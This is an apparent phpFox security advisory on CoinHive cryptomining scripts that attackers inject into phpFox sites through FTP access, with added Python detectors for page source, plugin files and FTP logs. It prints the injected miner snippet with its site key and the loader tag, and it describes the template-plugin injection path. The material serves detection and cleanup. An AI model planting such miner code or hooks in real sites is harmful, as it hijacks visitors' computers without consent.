CryptoCurrency Miner Script
Nowadays you hear people talking about cryptocurrencies every day. Cryptocurrency is the new trend, and everybody wants a piece of the cake. This trend has led to online platforms that let webmasters install coin miners on their websites as an alternative means of monetization. Unfortunately, hackers can also abuse coin miner scripts by injecting them into websites without the webmasters' knowledge, so that the profit goes to them.
According to reports and observations we have made recently, phpFox, like other popular platforms such as WordPress and Joomla, is also a target for hackers. They have injected miner scripts into many phpFox sites without the webmasters' permission. Among these scripts, CoinHive is the most widespread and popular; it lets hackers hijack sites and drain the resources of users who visit them.
What is CoinHive?
CoinHive is one of the most popular JavaScript cryptocurrency miners for websites. According to its creators, it is a JavaScript miner for the Monero blockchain that webmasters can embed into their websites. Users run the miner directly in their browsers and mine for the webmaster in return for an ad-free experience, in-game currency and so on.
Unfortunately, cybercriminals see this as an opportunity and have started abusing the tool: they first hack into websites and then embed this JavaScript code into the core of popular platforms without the site owner's consent. In this way, hackers use the computers of site visitors to mine digital currency for themselves without the users' permission.
In fact, CoinHive hijacking is becoming a security threat across popular social network and CMS platforms. Hackers target these platforms because sites built on them attract a large volume of users every day, which is ideal for coin mining. There are records of sites running WordPress, Joomla, Magento, Drupal and many other popular platforms falling victim to this kind of attack. Please refer to this article for more info. Certainly, our phpFox platform is not an exception to this plague.
What are impacts of injected CoinHive script?
By injecting the CoinHive script into the core of the platform, the mining script is called and run automatically whenever users load any page of the infected site. Once the CoinHive script runs, resources on the user's computer are hijacked and used as a coin miner. The script runs secretly in the background, so ordinary users don't even know it exists and cannot take action.
Under the effect of the CoinHive miner script, the common symptoms that site visitors can easily notice are:
- High CPU and graphics card usage.
- The computer becomes slow, both in the browser and in other programs.
- The computer eventually stops working under the high load.
How to detect websites using CoinHive script?
As mentioned above, the most obvious way to know whether a site is running the CoinHive script is to watch the performance of your computer. If you visit a site and notice that your computer runs slower than usual, and the site owner has not announced that CoinHive is being used as an alternative source of revenue, please contact the site owner immediately. There is a high probability that the site has already been hijacked by hackers and is running coin miner scripts.
On the phpFox platform, the quick and easy way to detect whether the CoinHive script is running is to pull up and examine the page source after logging in to the site (to view the page source, right-click on a page and select 'View Page Source').
You might see something similar to this in the page source:
<script>;$Ready(function() {setTimeout(function(){ var miner = new CoinHive.Anonymous('uoVwp8UScbNhkfzJn7rPNZFP3Pe1c54x');miner.start(); }, 10000);});</script>
Notice the site key, the long alphanumeric string passed to CoinHive.Anonymous (marked in red in the original post): this is the key generated by the hackers. Any coins mined are credited to the hackers through this key.
And:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
These are indicators that a site is running CoinHive in the background.
An easy way to detect CoinHive and prevent it from running and eating up all your computer's resources is to use a coin-mining blocker extension in your browser.
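To automate the page-source check described above, here is an added Python example (not code from the original post or from phpFox) that pulls the script tags out of a saved page, flags the CoinHive loader URL, and extracts the site key from the Anonymous(...) call. The two sample pages are constructed inline; the infected one simply wraps the two snippets quoted above. The minimum key length of 20 characters is an assumption made for the regex.

```python
import re
from html.parser import HTMLParser

# Constructed sample: the loader tag and the inline miner call quoted in the
# post above, wrapped in a minimal page. Not captured from a real site.
INFECTED_PAGE = """<html><head><title>phpFox</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
</head><body>
<script>;$Ready(function() {setTimeout(function(){ var miner = new CoinHive.Anonymous('uoVwp8UScbNhkfzJn7rPNZFP3Pe1c54x');miner.start(); }, 10000);});</script>
</body></html>"""

# Constructed clean page for comparison.
CLEAN_PAGE = "<html><head><script src='/static/app.js'></script></head><body>hi</body></html>"

# Indicators taken from the post: the CoinHive library URL and the Anonymous() constructor.
# A key length of at least 20 alphanumeric characters is an assumption.
LIB_RE = re.compile(r"coinhive\.com/lib/coinhive(\.min)?\.js", re.I)
KEY_RE = re.compile(r"CoinHive\.Anonymous\(\s*['\"]([A-Za-z0-9]{20,})['\"]", re.I)


class _ScriptCollector(HTMLParser):
    """Collect <script src=...> URLs and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script content to handle_data as raw text.
        if self._in_script:
            self.inline.append(data)


def scan_page_source(html):
    """Return the CoinHive indicators found in a page: loader URLs and site keys."""
    parser = _ScriptCollector()
    parser.feed(html)
    loaders = [s for s in parser.srcs if LIB_RE.search(s)]
    keys = []
    for body in parser.inline:
        keys.extend(KEY_RE.findall(body))
    return {"loader_urls": loaders, "site_keys": keys, "infected": bool(loaders or keys)}


if __name__ == "__main__":
    for name, page in (("infected", INFECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(name, scan_page_source(page))
```

Run it against a page you saved with 'View Page Source'; the site key it prints is the value to keep for the abuse report mentioned at the end of this post.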
We suggest extensions such as:
J2TeaM Security
– Google Chrome: https://chrome.google.com/webstore/detail/j2team-security/hmlcjjclebjnfohgmgikjfnbmfkigocc/
No Coin
– Google Chrome: https://chrome.google.com/webstore/detail/no-coin-block-miners-on-t/gojamcfopckidlocpkbelmpjcgmbgjcl?hl=en
– Firefox: https://addons.mozilla.org/en-US/firefox/addon/no-coin/
How is CoinHive injected into phpFox?
Going a little deeper, we found that when hackers have FTP access with permission to modify files on a phpFox site, they insert a line into this file:
…/PF.Base/include/library/phpfox/template/template.class.php
This line checks for the existence of a plugin. If the plugin exists, it runs and operates on the template. In this case, it is a plugin called template_getheader, which is located at:
…/PF.Base/module/core/include/plugin/template_getheader.php
This file has simple content. It plainly inserts the coin mining script into the header of the phpFox main template file, so every page is loaded with the script embedded.
In other words, the flow of these actions is basically:
- The user requests a page.
- The template file is called to render the page.
- The injected code in the template file executes and calls the malicious plugin.
- The plugin inserts the coin mining script into the template file.
- From the corrupted template file, the page is rendered with the coin mining script attached.
- The user loads the page and runs the script as well.
Therefore, this is definitely NOT a security vulnerability in the phpFox script. Without FTP permission to access, create, upload or modify files, there is no way for hackers to plant scripts and files in the core of the phpFox platform.
How to remove CoinHive script?
After studying how hackers use the script on phpFox pages, we suggest a simple way to get rid of the CoinHive script: remove the malicious plugin file from the core of phpFox.
As mentioned above, the maliciously added file is located in:
…/PF.Base/module/core/include/plugin/template_getXXXXX.php
In our testing, we found that after removing this malicious plugin file, the template file no longer generates the coin mining script on the page and renders normally, so users can safely access your site.
Please note that the plugin file comes under many names, usually in the format template_getXXXXX.php, such as template_getheader.php or template_gettemplate.php…
An easier way to identify the file is by checking the created/modified dates of the files. It is usually the most recently created/modified file in the folder.
However, this solution is suggested only as a temporary fix at this early stage of the investigation. We will conduct more research into the source and origins to provide better solutions. In any case, no solution will work unless you manage FTP access seriously and carefully.
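The two clues given above (the template_getXXXXX.php name pattern and the most recent created/modified date) can be combined into a quick triage script. The following Python is an added example, not code from the original post or from phpFox: it lists every template_get*.php file in a plugin folder, newest first, and marks the ones whose contents reference CoinHive. The sample folder and its two plugin files are constructed in a temporary directory; their contents are hypothetical and are not real phpFox plugin code.

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Content markers from the post: the CoinHive loader URL and constructor name.
MARKERS = re.compile(r"coinhive\.com/lib/coinhive|CoinHive\.Anonymous", re.I)
# File-name pattern described in the post: template_getXXXXX.php
NAME_RE = re.compile(r"^template_get\w+\.php$", re.I)


def find_suspicious_plugins(plugin_dir):
    """Return (mtime, path, has_marker) for each template_get*.php file,
    newest first, so the most recently created/modified file is at the top."""
    results = []
    for entry in os.scandir(plugin_dir):
        if not entry.is_file() or not NAME_RE.match(entry.name):
            continue
        text = Path(entry.path).read_text(errors="replace")
        results.append((entry.stat().st_mtime, entry.path, bool(MARKERS.search(text))))
    results.sort(key=lambda r: r[0], reverse=True)
    return results


def build_sample_plugin_dir():
    """Construct a throwaway plugin folder: one older benign file and one
    recently planted file. Hypothetical contents, not real phpFox plugin code."""
    d = tempfile.mkdtemp(prefix="phpfox_plugin_")
    benign = Path(d) / "template_getfooter.php"
    benign.write_text("<?php\n// benign hypothetical plugin\n$sFooter = 'ok';\n")
    thirty_days_ago = time.time() - 30 * 86400
    os.utime(benign, (thirty_days_ago, thirty_days_ago))  # backdate the benign file
    planted = Path(d) / "template_getheader.php"
    planted.write_text(
        "<?php\n"
        "$sHeader .= '<script src=\"https://coinhive.com/lib/coinhive.min.js\"></script>';\n"
    )
    return d


if __name__ == "__main__":
    folder = build_sample_plugin_dir()
    for mtime, path, flagged in find_suspicious_plugins(folder):
        print(time.strftime("%Y-%m-%d %H:%M", time.localtime(mtime)),
              "FLAGGED" if flagged else "ok     ", os.path.basename(path))
```

Point find_suspicious_plugins at the real plugin folder under PF.Base/module/core/include/plugin/ on your installation; review a flagged file before deleting it, and keep a copy of it for the investigation.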
How to prevent your site from injection of CoinHive script?
Currently, we know for sure that hackers are unable to inject the scripts into your site without FTP permission to access and manipulate files.
Therefore, manage FTP access seriously and carefully. Whenever you give FTP access to any party, create a separate account for each one, so that if any party creates or modifies anything on your site, their activity is logged and you can trace it back if anything happens. Make sure FTP logging is enabled and check the log for the date the malicious plugin file was created; there is a high chance you will find out which party created or uploaded the file to your site. Change the passwords of FTP accounts periodically, or right after a party completes its work on your site.
Also, be wary of suspicious apps and modules. Make sure you purchase them from trustworthy developers and companies. If you think an app is causing this issue, please don't hesitate to contact the phpFox team; we will review the app and take appropriate action if needed. All help is appreciated in this process.
Lastly, back up your site regularly. Watch for changes on your site: if it doesn't work as usual (slower, sluggish…), check for the coin mining script as described above. If the issue is present, revert to the latest backup and trace which changes you made that might have caused it (installed an app, gave FTP access to someone…).
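The advice above (one FTP account per party, logging enabled, then checking the log for the day the plugin file was created) is easy to turn into a small correlation step. The following Python is an added example, not code from the original post or from phpFox: it parses upload records, keeps those that wrote a file of the given name within a window around the file's modification time, and returns the accounts responsible. The log lines are constructed in the style of a vsftpd log and the account names, IP addresses and timestamps are invented.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log in vsftpd style; not taken from a real server.
SAMPLE_FTP_LOG = """\
Mon Nov 27 09:12:41 2017 [pid 2231] [designer_agency] OK LOGIN: Client "198.51.100.7"
Mon Nov 27 09:14:03 2017 [pid 2233] [designer_agency] OK UPLOAD: Client "198.51.100.7", "/PF.Base/theme/default/style.css", 8123 bytes, 41.2Kbyte/sec
Tue Nov 28 23:40:10 2017 [pid 3102] [contractor_x] OK LOGIN: Client "203.0.113.55"
Tue Nov 28 23:41:52 2017 [pid 3104] [contractor_x] OK UPLOAD: Client "203.0.113.55", "/PF.Base/module/core/include/plugin/template_getheader.php", 412 bytes, 3.1Kbyte/sec
Tue Nov 28 23:42:30 2017 [pid 3104] [contractor_x] OK UPLOAD: Client "203.0.113.55", "/PF.Base/include/library/phpfox/template/template.class.php", 15220 bytes, 120.4Kbyte/sec
"""

# Matches only successful upload records; logins and other events are ignored.
UPLOAD_RE = re.compile(
    r"^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[(?P<user>[^\]]+)\] "
    r"OK UPLOAD: Client \"(?P<ip>[^\"]+)\", \"(?P<path>[^\"]+)\""
)


def parse_uploads(log_text):
    """Turn upload records into dicts with a parsed timestamp, account, client IP and path."""
    uploads = []
    for line in log_text.splitlines():
        m = UPLOAD_RE.match(line)
        if not m:
            continue
        # vsftpd pads single-digit days with a space; collapse it before parsing.
        ts = datetime.strptime(m.group("ts").replace("  ", " "), "%a %b %d %H:%M:%S %Y")
        uploads.append({"time": ts, "user": m.group("user"),
                        "ip": m.group("ip"), "path": m.group("path")})
    return uploads


def uploads_near(log_text, file_name, file_mtime, window_hours=24):
    """Uploads of a file with this name within +/- window_hours of the file's mtime."""
    lo = file_mtime - timedelta(hours=window_hours)
    hi = file_mtime + timedelta(hours=window_hours)
    return [u for u in parse_uploads(log_text)
            if u["path"].endswith("/" + file_name) and lo <= u["time"] <= hi]


def accounts_that_uploaded(log_text, file_name, file_mtime, window_hours=24):
    """Sorted list of FTP accounts that uploaded the named file around its mtime."""
    return sorted({u["user"] for u in uploads_near(log_text, file_name, file_mtime, window_hours)})


if __name__ == "__main__":
    # Pretend the plugin file's modification time came from the triage step.
    plugin_mtime = datetime(2017, 11, 28, 23, 41, 52)
    for u in uploads_near(SAMPLE_FTP_LOG, "template_getheader.php", plugin_mtime):
        print(u["time"], u["user"], u["ip"], u["path"])
    print("accounts:", accounts_that_uploaded(SAMPLE_FTP_LOG, "template_getheader.php", plugin_mtime))
```

Because each party has its own account, the answer names the party rather than a shared login; the same query over template.class.php shows whether the template file was modified in the same session.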
Report Abuse to CoinHive team
Also, if you think a site is using the CoinHive script without notifying its users, you can report CoinHive abuse here. Make sure you have the site key when reporting the abuse.
In any case, you can always contact us to seek assistance.